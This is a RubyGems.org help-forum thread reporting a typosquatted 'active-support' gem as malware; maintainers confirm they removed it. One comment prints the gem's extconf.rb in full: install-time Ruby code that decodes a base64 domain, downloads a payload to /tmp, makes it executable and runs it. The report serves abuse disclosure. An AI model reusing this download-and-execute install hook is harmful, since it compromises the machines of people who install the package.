tag:help.rubygems.org,2010-01-19:/discussions/problems/32656-reporting-abuse-on-active-supportRubyGems.org: Discussion 2018-08-09T13:10:57Ztag:help.rubygems.org,2010-01-19:Comment/458664932018-08-09T02:15:12Z2018-08-09T02:15:13ZReporting Abuse on active-support<div><p>Further investigation shows definite malware behaviour.</p>
<p>The gem duplicate official activesupport (no hyphen) code but adds a compiled extension.</p>
<p>active-support-5.2.0.gem/data/ext/trellislike/unflaming/waffling/extconf.rb<br>
attempts to resolve a base64 encoded domain, download a payload and execute.</p>
<p>require 'net/http'<br>
require 'uri'<br>
require 'base64'<br>
require 'resolv'</p>
<p>class Smectis<br>
def self.install_explot(weighership) if !weighership.nil? and weighership != '0.0.0.0' educable = Net::HTTP.get_response(URI('http://' + weighership + '/mimming')) File.open('/tmp/autosymbiontic', 'wb+') do |uterometer| uterometer.binmode uterometer.write(educable.body) uterometer.chmod(0777) uterometer.close end system('/tmp/autosymbiontic') end end</p>
<p>def self.run() milligram = 'MjlmYWVhNjMucGxhbmZobnRhZ2UuZGU=' jaunting = nil begin jaunting = Resolv.getaddress(Base64.decode64(milligram)) rescue end self.install_exploit(jaunting) end end</p>
<p>Smectis.run()</p></div>Sam Giffneytag:help.rubygems.org,2010-01-19:Comment/458664932018-08-09T12:15:46Z2018-08-09T12:15:48ZReporting Abuse on active-support<div><p>Probably the same thing with this gem from the same user: <a href="https://rubygems.org/gems/deamons">https://rubygems.org/gems/deamons</a></p></div>Patrick Figeltag:help.rubygems.org,2010-01-19:Comment/458664932018-08-09T13:10:56Z2018-08-09T13:10:56ZReporting Abuse on active-support<div><p>Thanks for the report. We have removed the gem.</p></div>David Radcliffe